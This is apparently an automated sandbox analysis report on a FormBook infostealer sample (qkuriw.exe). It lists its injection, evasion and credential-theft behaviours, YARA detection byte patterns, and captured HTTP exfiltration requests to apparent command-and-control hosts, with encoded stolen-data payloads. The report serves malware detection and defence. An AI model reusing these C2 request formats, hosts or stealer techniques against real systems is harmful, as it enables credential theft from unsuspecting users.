Loading ...

Play interactive tourEdit tour

Analysis Report qkuriw.jpg

Overview

General Information

Sample Name:qkuriw.jpg (renamed file extension from jpg to exe)
Analysis ID:255298
MD5:7af33570ec886974f5513b46e999b988
SHA1:6b9e35f3131fdc4bd8ea66cd44303cb1004b2019
SHA256:da4647425789cc5a32d2719815367c8c21d2279a77a3179e609e1db9844ef15a

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • qkuriw.exe (PID: 6804 cmdline: 'C:\Users\user\Desktop\qkuriw.exe' MD5: 7AF33570EC886974F5513B46E999B988)
    • explorer.exe (PID: 3420 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • mstsc.exe (PID: 7044 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
qkuriw.exeJoeSecurity_FormBookYara detected FormBookJoe Security
    qkuriw.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15805:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x152f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15907:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa6fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1456c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb3f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b577:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c58a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    qkuriw.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x184e9:$sqlite3step: 68 34 1C 7B E1
    • 0x185fc:$sqlite3step: 68 34 1C 7B E1
    • 0x18518:$sqlite3text: 68 38 2A 90 C5
    • 0x1863d:$sqlite3text: 68 38 2A 90 C5
    • 0x1852b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18653:$sqlite3blob: 68 53 D8 7F 8C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x88f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14805:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x142f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14907:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14a7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x96fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1356c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa3f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1a577:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1b58a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x174e9:$sqlite3step: 68 34 1C 7B E1
      • 0x175fc:$sqlite3step: 68 34 1C 7B E1
      • 0x17518:$sqlite3text: 68 38 2A 90 C5
      • 0x1763d:$sqlite3text: 68 38 2A 90 C5
      • 0x1752b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17653:$sqlite3blob: 68 53 D8 7F 8C
      00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15805:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x152f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15907:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa6fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1456c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb3f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b577:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c58a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.qkuriw.exe.1220000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.qkuriw.exe.1220000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8af8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14a05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x144f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14b07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14c7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x98fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1376c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa5f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b78a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.qkuriw.exe.1220000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x176e9:$sqlite3step: 68 34 1C 7B E1
          • 0x177fc:$sqlite3step: 68 34 1C 7B E1
          • 0x17718:$sqlite3text: 68 38 2A 90 C5
          • 0x1783d:$sqlite3text: 68 38 2A 90 C5
          • 0x1772b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17853:$sqlite3blob: 68 53 D8 7F 8C
          0.0.qkuriw.exe.1220000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            0.0.qkuriw.exe.1220000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8af8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14a05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x144f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14b07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14c7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x98fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1376c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa5f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a777:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b78a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: qkuriw.exe, type: SAMPLE
            Source: Yara matchFile source: 00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543067846.0000000003291000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.1277150451.0000000001221000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1325998412.0000000001560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1325803353.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543143849.0000000003470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543182112.00000000034A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: qkuriw.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 4x nop then pop ebx0_2_01227AFA
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop ebx4_2_03057AFC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi4_2_03066DEB

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49742
            Source: global trafficHTTP traffic detected: GET /aq3x/?rDHpw=xt9dcFt0dhip1fI&0L3HBdm=VigcpkHhs8n5DOV6yBCquYusmErcVSfEvB4fvkc+Oh3i26igEimj/0FcA/sd+n3eZmOl HTTP/1.1Host: www.atlhomebuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /aq3x/?0L3HBdm=SDLUZt00bibBYHuxY27Atwtg05TijM6qYQEqOnpyWohw9o7PXYLNmPyXYnCYkq9YIHmM&rDHpw=xt9dcFt0dhip1fI HTTP/1.1Host: www.regulars6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: POST /aq3x/ HTTP/1.1Host: www.atlhomebuilders.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.atlhomebuilders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.atlhomebuilders.com/aq3x/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 30 4c 33 48 42 64 6d 3d 64 41 73 6d 33 44 50 31 67 4e 4b 4c 62 76 4d 71 69 68 44 79 7e 4f 47 59 74 32 44 53 61 51 54 59 39 57 4a 33 71 54 49 44 47 67 6e 66 77 59 33 36 53 54 57 36 78 68 6b 47 61 5f 4d 42 73 58 72 56 4a 57 43 50 68 6c 47 33 6e 7a 65 4f 6a 4f 69 7a 78 67 68 6d 34 6a 4e 48 78 66 36 31 53 59 4a 53 31 2d 47 48 71 6b 42 32 4e 39 50 69 44 58 45 72 52 76 59 5a 56 54 5a 74 38 31 38 4a 57 6d 48 33 50 6b 68 4c 35 31 36 64 6d 54 49 6a 6f 32 74 64 55 53 53 4d 6d 69 49 42 28 79 68 55 6e 39 4f 70 4f 63 6b 6d 49 56 77 43 57 46 32 57 4e 72 76 33 43 37 53 36 41 6d 4d 71 41 5f 46 59 4f 69 4b 65 74 47 5a 6a 42 76 50 6a 58 41 69 44 78 6b 51 66 73 76 41 7a 51 67 41 52 36 48 64 43 50 4a 76 61 30 5a 66 62 31 53 64 67 28 35 70 30 28 50 74 6a 47 7a 78 43 31 32 63 50 34 61 45 30 28 6d 52 7a 52 51 30 4b 6e 6d 70 5f 76 58 69 50 77 5f 42 34 36 64 4d 52 36 5a 72 2d 33 69 7a 6e 4d 64 70 5f 6d 67 28 75 4c 53 51 41 55 44 38 75 4b 53 77 4b 37 63 4a 41 32 68 30 35 63 64 73 44 42 31 38 30 54 71 73 73 7a 65 63 78 73 62 38 4e 63 4f 64 59 47 67 74 41 41 6a 6f 50 71 32 61 73 48 59 28 35 4f 44 41 49 6b 35 5a 7a 71 30 4a 30 78 66 58 36 7a 37 48 39 72 6c 61 35 46 51 56 5f 58 73 73 79 32 61 78 47 72 62 54 6f 43 38 42 72 43 41 39 6b 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 0L3HBdm=dAsm3DP1gNKLbvMqihDy~OGYt2DSaQTY9WJ3qTIDGgnfwY36STW6xhkGa_MBsXrVJWCPhlG3nzeOjOizxghm4jNHxf61SYJS1-GHqkB2N9PiDXErRvYZVTZt818JWmH3PkhL516dmTIjo2tdUSSMmiIB(yhUn9OpOckmIVwCWF2WNrv3C7S6AmMqA_FYOiKetGZjBvPjXAiDxkQfsvAzQgAR6HdCPJva0Zfb1Sdg(5p0(PtjGzxC12cP4aE0(mRzRQ0Knmp_vXiPw_B46dMR6Zr-3iznMdp_mg(uLSQAUD8uKSwK7cJA2h05cdsDB180Tqsszecxsb8NcOdYGgtAAjoPq2asHY(5ODAIk5Zzq0J0xfX6z7H9rla5FQV_Xssy2axGrbToC8BrCA9kBg).
            Source: global trafficHTTP traffic detected: POST /aq3x/ HTTP/1.1Host: www.atlhomebuilders.comConnection: closeContent-Length: 184777Cache-Control: no-cacheOrigin: http://www.atlhomebuilders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.atlhomebuilders.com/aq3x/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 30 4c 33 48 42 64 6d 3d 64 41 73 6d 33 43 33 4c 6c 2d 6e 4e 65 64 6f 72 69 78 7a 71 76 66 57 30 70 78 4c 42 64 43 54 55 7e 42 35 6e 71 54 59 48 65 56 58 7a 30 37 76 36 44 78 7e 33 38 68 6b 46 63 5f 4d 47 37 48 6e 74 41 68 65 58 68 6e 71 5a 6e 7a 47 42 35 39 36 71 32 77 68 4c 35 44 78 37 35 5f 47 69 53 63 73 38 31 63 72 42 76 6b 46 32 54 64 58 67 47 47 30 4f 48 65 45 63 56 6a 55 6e 36 31 56 66 58 57 72 50 4e 42 6f 6b 75 41 61 6c 6a 68 55 71 6e 56 31 31 51 41 79 50 35 43 4d 43 77 54 35 4c 74 36 32 54 4e 64 6b 59 45 78 45 46 49 46 75 59 4b 73 4c 46 48 4b 6d 44 54 48 39 5a 41 34 59 6e 55 6b 71 4c 36 78 42 72 4e 2d 44 4a 63 53 4f 42 7e 31 51 58 6f 74 6f 43 53 67 52 46 34 48 4e 5a 46 35 43 41 35 5f 54 78 37 54 46 62 73 64 35 4f 77 65 64 78 4c 46 38 50 36 57 73 67 31 36 38 6e 77 6e 78 4e 53 53 59 77 6a 47 70 55 74 58 69 44 28 66 68 4d 77 4f 67 4b 79 34 62 54 70 54 72 76 43 75 39 57 6a 6d 28 79 46 57 55 56 57 7a 34 59 46 48 34 69 28 5f 6c 39 67 68 41 46 53 39 74 62 42 33 6b 46 54 71 73 65 7a 66 63 62 74 70 41 4e 64 61 49 43 47 42 74 45 58 7a 6f 4f 6d 47 4b 71 4f 4b 71 69 4f 44 6f 49 6b 4d 38 55 71 48 70 30 30 4a 7a 35 7a 66 54 39 76 56 61 35 44 51 56 75 47 73 68 65 31 5a 6c 52 6f 65 53 67 56 39 41 56 4b 42 45 37 65 44 4e 51 53 6d 55 67 6f 77 77 39 56 4b 31 75 68 49 68 52 71 66 4e 5f 72 34 48 30 44 78 6d 66 43 34 56 55 6a 5f 28 6f 76 67 77 7a 4a 74 47 53 34 65 6d 65 63 2d 7a 6c 55 71 57 4b 71 49 37 37 62 67 68 46 31 41 35 38 47 6f 37 76 48 52 68 56 53 5f 35 78 53 78 75 72 47 42 49 78 43 43 42 75 35 6f 53 50 68 73 39 77 7a 44 44 57 6c 6e 46 36 5a 30 6e 50 76 48 62 5a 61 42 55 54 66 42 46 4e 63 6f 56 4e 70 46 53 51 42 4b 4d 46 54 79 34 74 50 76 78 55 68 57 42 49 6d 70 33 6f 44 65 43 31 4e 66 39 53 69 39 50 59 31 6d 34 63 28 39 7e 6c 79 67 4a 59 54 74 45 76 67 50 69 43 7a 6e 4e 50 66 53 34 31 7e 32 38 4f 6d 41 73 69 75 45 68 52 64 5f 4f 30 58 45 70 44 72 43 49 49 44 52 4d 39 43 45 50 57 31 30 54 55 34 66 54 59 70 4b 4e 34 32 56 6f 54 32 56 28 69 28 69 57 7a 43 54 5a 71 48 48 28 4a 6d 46 58 4f 4e 64 76 79 56 6d 70 70 58 4d 4a 6d 68 45 5a 32 4c 39 34 70 67 2d 66 39 48 67 4f 59 5a 45 6b 70 43 44 35 68 62 54 79 31 4b 57 6a 79 45 59 64 70 79 66 70 4a 52 47 51 4d 6d 59 42 49 48 33 68 7a 28 62 61 36 51 4e 41 45 76 4d 61 33 50 36 46 49 36 77 6c 46 64 2d 4f 36 6d 7a 66 7a 52 31 48 4a 41 6a 70 72 77 54 66 41 4d 67 36 64 6f 4e 41 61 31 66 4e 64 75 57 5a 35 63 38 35 47 33 45 71 63 65 42 46 61 30 70 70 4e 42 53 79 47 50 66 35 51 7e 77 34 41 47 70 43 68 4d 73 41 34 34 79 6d 61 6a 47 67 36 7a 50 6d 71 6a 4c 62 73 67 37 4e 41 62 6e 53 39 32 6e 41 58 4b 58 76
            Source: global trafficHTTP traffic detected: POST /aq3x/ HTTP/1.1Host: www.regulars6.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.regulars6.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.regulars6.com/aq3x/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 30 4c 33 48 42 64 6d 3d 61 68 48 75 48 4b 5a 45 62 6a 58 4f 4d 31 61 37 4d 44 65 36 31 47 52 68 78 4c 50 4d 6a 38 69 61 4b 56 74 50 4b 56 4a 71 58 4c 67 32 76 34 62 38 5a 34 32 76 30 59 33 49 4d 30 71 63 78 5f 4e 4e 65 69 4f 68 37 66 44 63 72 33 72 66 79 37 46 53 47 41 71 6a 43 48 37 74 35 5a 71 32 4e 64 66 34 48 62 43 63 66 73 47 71 65 6e 79 44 39 50 78 59 78 34 6d 31 47 5f 75 2d 49 4f 71 56 31 45 56 4c 44 56 66 68 44 36 78 6b 52 67 59 68 56 76 28 6b 66 4e 74 41 6d 58 71 6c 75 50 72 46 50 6f 32 46 36 75 36 58 58 4b 36 73 43 6a 46 4e 43 42 68 71 55 54 74 63 30 46 68 68 52 32 42 69 6e 59 56 69 5a 70 54 47 62 64 35 78 64 79 70 34 41 72 31 36 51 4c 5a 75 30 44 69 63 47 58 64 6e 31 36 44 6b 65 46 59 6a 64 54 6e 4c 28 47 51 35 31 61 43 71 73 6e 53 66 44 58 4f 51 28 38 65 76 42 75 4b 4e 4d 33 47 72 47 49 47 31 35 58 70 4b 78 51 54 76 76 4d 7a 2d 50 56 7e 53 41 45 48 6e 43 66 33 6b 56 44 39 4d 30 77 48 5f 49 61 46 43 67 67 50 46 28 7a 6d 7a 51 76 7a 45 6f 5a 77 63 34 33 73 7a 53 72 49 77 33 41 42 65 7a 5a 58 47 42 36 5a 6d 74 46 33 4a 4b 69 69 78 62 74 4d 50 71 49 4d 34 6d 74 6c 61 73 61 52 58 4b 6c 41 31 4d 35 34 56 55 33 52 78 71 4a 4b 76 6c 67 69 42 71 58 41 71 32 48 64 49 75 37 74 49 66 55 54 79 54 49 32 4d 37 51 29 2e 00 47 72 62 54 6f 43 38 Data Ascii: 0L3HBdm=ahHuHKZEbjXOM1a7MDe61GRhxLPMj8iaKVtPKVJqXLg2v4b8Z42v0Y3IM0qcx_NNeiOh7fDcr3rfy7FSGAqjCH7t5Zq2Ndf4HbCcfsGqenyD9PxYx4m1G_u-IOqV1EVLDVfhD6xkRgYhVv(kfNtAmXqluPrFPo2F6u6XXK6sCjFNCBhqUTtc0FhhR2BinYViZpTGbd5xdyp4Ar16QLZu0DicGXdn16DkeFYjdTnL(GQ51aCqsnSfDXOQ(8evBuKNM3GrGIG15XpKxQTvvMz-PV~SAEHnCf3kVD9M0wH_IaFCggPF(zmzQvzEoZwc43szSrIw3ABezZXGB6ZmtF3JKiixbtMPqIM4mtlasaRXKlA1M54VU3RxqJKvlgiBqXAq2HdIu7tIfUTyTI2M7Q).GrbToC8
            Source: global trafficHTTP traffic detected: POST /aq3x/ HTTP/1.1Host: www.regulars6.comConnection: closeContent-Length: 184777Cache-Control: no-cacheOrigin: http://www.regulars6.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.regulars6.com/aq3x/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 30 4c 33 48 42 64 6d 3d 61 68 48 75 48 4c 51 7a 59 54 44 6c 47 6e 7e 34 4d 54 4f 4d 78 47 68 5f 7a 34 4c 66 31 65 7a 72 4a 46 52 66 4b 55 35 75 61 71 78 7a 38 4e 54 38 66 36 4f 6f 67 6f 33 50 59 45 71 62 6e 5f 4a 35 64 78 7e 54 37 64 75 55 72 33 6a 65 39 61 31 54 46 51 71 30 41 6e 28 5f 28 5a 57 58 4e 66 61 42 45 34 75 55 61 73 36 71 51 33 61 42 34 71 73 45 30 39 65 2d 59 66 43 37 45 73 37 54 31 58 42 61 42 77 50 44 43 37 39 6d 47 43 45 71 65 4d 58 41 62 65 64 4c 37 33 7e 69 68 75 75 66 4b 4c 53 42 35 71 75 68 62 6f 43 76 42 54 64 4c 46 47 6c 4d 66 43 35 68 79 57 6f 53 52 31 51 56 76 4b 78 5f 64 6f 50 30 59 73 31 50 56 6a 39 36 50 38 5a 79 48 39 74 58 32 41 37 4f 65 57 73 31 6d 37 75 35 64 47 67 7a 44 43 76 34 39 30 6b 31 74 5f 7e 37 76 77 4b 58 65 47 7e 5f 36 2d 7e 34 4a 65 71 5f 63 6b 71 5a 49 49 48 38 37 58 70 47 6c 44 4b 47 71 37 54 31 5a 47 6e 45 4f 6e 6e 34 43 76 62 76 53 42 34 50 33 52 66 69 59 36 35 47 76 7a 47 34 37 52 4c 78 58 64 75 78 30 4a 77 66 34 78 77 73 53 72 4a 50 33 45 30 37 79 6f 44 47 44 6f 68 31 71 6b 33 7a 4d 69 6a 78 59 38 38 4e 67 61 59 6f 6d 74 74 61 6a 4f 56 39 4c 57 51 31 62 38 38 61 55 57 52 78 28 35 4b 76 77 51 6a 44 70 58 64 76 30 52 64 6a 67 70 4d 76 66 41 69 67 61 35 72 58 6a 42 6b 78 50 47 31 67 35 32 66 75 50 68 4c 41 36 67 65 52 32 36 4c 65 51 78 38 4a 45 70 7a 34 43 6c 75 36 6f 34 49 49 7e 4f 6b 58 63 31 7a 70 61 62 49 6d 57 72 6f 5f 46 48 59 46 39 31 6a 46 32 37 67 45 30 59 38 69 71 64 65 6d 52 4d 32 55 46 4e 59 5a 39 38 47 34 77 45 57 76 6a 78 4b 4b 4b 45 31 77 42 4c 37 64 76 47 38 47 62 55 35 76 4e 54 32 37 61 44 57 6d 65 48 43 6f 48 44 35 4e 70 65 70 38 38 59 36 51 37 48 36 6d 63 71 50 52 6f 32 55 57 76 33 43 4c 56 59 39 46 61 79 48 37 37 5a 32 42 64 4e 53 33 4b 59 79 33 39 74 4c 56 58 5a 38 77 30 78 39 4b 65 45 74 59 73 49 4a 39 35 64 6b 6f 34 56 57 66 49 45 44 34 65 63 62 55 50 63 47 6a 58 66 42 5a 30 4d 76 52 73 68 6e 34 4a 68 58 6c 42 4c 66 53 6e 54 69 5a 43 55 68 76 74 66 48 4d 39 4a 68 5a 38 48 4b 61 55 61 58 78 77 34 43 62 30 77 39 71 31 38 64 48 4e 49 53 44 77 78 70 63 74 5a 63 45 7a 36 57 49 64 6e 70 50 57 71 46 78 6f 64 38 34 34 42 49 72 6a 4f 41 51 45 38 66 5a 57 58 38 49 68 47 37 57 52 39 66 37 53 4e 4e 5a 7a 64 49 68 6b 4e 77 39 61 39 6d 7a 51 66 6d 37 32 79 50 50 34 75 56 7a 74 6f 56 6c 4d 56 78 4e 41 59 4e 67 77 46 70 6d 78 52 4f 62 63 55 4f 45 77 73 54 51 31 56 32 62 4d 4f 4b 63 4a 31 45 70 47 34 44 37 49 58 31 2d 68 71 45 67 46 44 4c 33 46 33 74 37 68 53 57 6a 44 35 42 4d 69 54 66 5f 47 78 42 30 74 62 4b 78 6d 4d 73 38 37 6b 36 59 42 53 30 38 51 48 48 4f 39 4c 30 36 4b 6d 74 79 70 67 6b 73 55
            Source: global trafficHTTP traffic detected: GET /aq3x/?rDHpw=xt9dcFt0dhip1fI&0L3HBdm=VigcpkHhs8n5DOV6yBCquYusmErcVSfEvB4fvkc+Oh3i26igEimj/0FcA/sd+n3eZmOl HTTP/1.1Host: www.atlhomebuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /aq3x/?0L3HBdm=SDLUZt00bibBYHuxY27Atwtg05TijM6qYQEqOnpyWohw9o7PXYLNmPyXYnCYkq9YIHmM&rDHpw=xt9dcFt0dhip1fI HTTP/1.1Host: www.regulars6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: unknownDNS traffic detected: queries for: g.msn.com
            Source: unknownHTTP traffic detected: POST /aq3x/ HTTP/1.1Host: www.atlhomebuilders.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.atlhomebuilders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.atlhomebuilders.com/aq3x/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 30 4c 33 48 42 64 6d 3d 64 41 73 6d 33 44 50 31 67 4e 4b 4c 62 76 4d 71 69 68 44 79 7e 4f 47 59 74 32 44 53 61 51 54 59 39 57 4a 33 71 54 49 44 47 67 6e 66 77 59 33 36 53 54 57 36 78 68 6b 47 61 5f 4d 42 73 58 72 56 4a 57 43 50 68 6c 47 33 6e 7a 65 4f 6a 4f 69 7a 78 67 68 6d 34 6a 4e 48 78 66 36 31 53 59 4a 53 31 2d 47 48 71 6b 42 32 4e 39 50 69 44 58 45 72 52 76 59 5a 56 54 5a 74 38 31 38 4a 57 6d 48 33 50 6b 68 4c 35 31 36 64 6d 54 49 6a 6f 32 74 64 55 53 53 4d 6d 69 49 42 28 79 68 55 6e 39 4f 70 4f 63 6b 6d 49 56 77 43 57 46 32 57 4e 72 76 33 43 37 53 36 41 6d 4d 71 41 5f 46 